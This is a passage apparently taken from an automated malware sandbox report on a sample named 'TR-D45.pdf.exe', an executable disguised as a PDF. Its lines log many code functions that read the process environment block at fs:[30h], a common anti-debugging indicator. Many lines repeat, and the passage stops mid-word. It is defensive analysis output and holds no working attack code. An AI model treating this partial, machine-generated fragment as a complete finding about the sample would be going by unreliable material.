Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2FFF10 mov eax, dword ptr fs:[00000030h] | 1_2_1E2FFF10
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E27FF60 mov eax, dword ptr fs:[00000030h] | 1_2_1E27FF60
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E338F6A mov eax, dword ptr fs:[00000030h] | 1_2_1E338F6A
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E27EF40 mov eax, dword ptr fs:[00000030h] | 1_2_1E27EF40
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E278794 mov eax, dword ptr fs:[00000030h] | 1_2_1E278794
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2E7794 mov eax, dword ptr fs:[00000030h] | 1_2_1E2E7794
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2E7794 mov eax, dword ptr fs:[00000030h] | 1_2_1E2E7794
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2E7794 mov eax, dword ptr fs:[00000030h] | 1_2_1E2E7794
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A37F5 mov eax, dword ptr fs:[00000030h] | 1_2_1E2A37F5
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E29BC2C mov eax, dword ptr fs:[00000030h] | 1_2_1E29BC2C
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h] | 1_2_1E2E6C0A
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h] | 1_2_1E2E6C0A
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h] | 1_2_1E2E6C0A
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h] | 1_2_1E2E6C0A
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] | 1_2_1E321C06
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] | 1_2_1E321C06
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] | 1_2_1E321C06
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] | 1_2_1E321C06
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] | 1_2_1E321C06
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] | 1_2_1E321C06
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] | 1_2_1E321C06
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] | 1_2_1E321C06
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] | 1_2_1E321C06
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] | 1_2_1E321C06
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] | 1_2_1E321C06
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] | 1_2_1E321C06
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] | 1_2_1E321C06
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] | 1_2_1E321C06
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E33740D mov eax, dword ptr fs:[00000030h] | 1_2_1E33740D
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E33740D mov eax, dword ptr fs:[00000030h] | 1_2_1E33740D
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E33740D mov eax, dword ptr fs:[00000030h] | 1_2_1E33740D
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E28746D mov eax, dword ptr fs:[00000030h] | 1_2_1E28746D
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E29A44B mov eax, dword ptr fs:[00000030h] | 1_2_1E29A44B
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2FC450 mov eax, dword ptr fs:[00000030h] | 1_2_1E2FC450
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2FC450 mov eax, dword ptr fs:[00000030h] | 1_2_1E2FC450
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E27849B mov eax, dword ptr fs:[00000030h] | 1_2_1E27849B
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E3214FB mov eax, dword ptr fs:[00000030h] | 1_2_1E3214FB
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2E6CF0 mov eax, dword ptr fs:[00000030h] | 1_2_1E2E6CF0
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2E6CF0 mov eax, dword ptr fs:[00000030h] | 1_2_1E2E6CF0
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2E6CF0 mov eax, dword ptr fs:[00000030h] | 1_2_1E2E6CF0
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E338CD6 mov eax, dword ptr fs:[00000030h] | 1_2_1E338CD6
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E338D34 mov eax, dword ptr fs:[00000030h] | 1_2_1E338D34
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E32E539 mov eax, dword ptr fs:[00000030h] | 1_2_1E32E539
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E294D3B mov eax, dword ptr fs:[00000030h] | 1_2_1E294D3B
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E294D3B mov eax, dword ptr fs:[00000030h] | 1_2_1E294D3B
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E294D3B mov eax, dword ptr fs:[00000030h] | 1_2_1E294D3B
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] | 1_2_1E273D34
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] | 1_2_1E273D34
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] | 1_2_1E273D34
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] | 1_2_1E273D34
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] | 1_2_1E273D34
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] | 1_2_1E273D34
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] | 1_2_1E273D34
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] | 1_2_1E273D34
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] | 1_2_1E273D34
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] | 1_2_1E273D34
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] | 1_2_1E273D34
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] | 1_2_1E273D34
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] | 1_2_1E273D34
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E26AD30 mov eax, dword ptr fs:[00000030h] | 1_2_1E26AD30
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2EA537 mov eax, dword ptr fs:[00000030h] | 1_2_1E2EA537
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E28C577 mov eax, dword ptr fs:[00000030h] | 1_2_1E28C577
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E28C577 mov eax, dword ptr fs:[00000030h] | 1_2_1E28C577
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A3D43 mov eax, dword ptr fs:[00000030h] | 1_2_1E2A3D43
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2E3540 mov eax, dword ptr fs:[00000030h] | 1_2_1E2E3540
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E313D40 mov eax, dword ptr fs:[00000030h] | 1_2_1E313D40
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E287D50 mov eax, dword ptr fs:[00000030h] | 1_2_1E287D50
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2935A1 mov eax, dword ptr fs:[00000030h] | 1_2_1E2935A1
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E291DB5 mov eax, dword ptr fs:[00000030h] | 1_2_1E291DB5
      Sou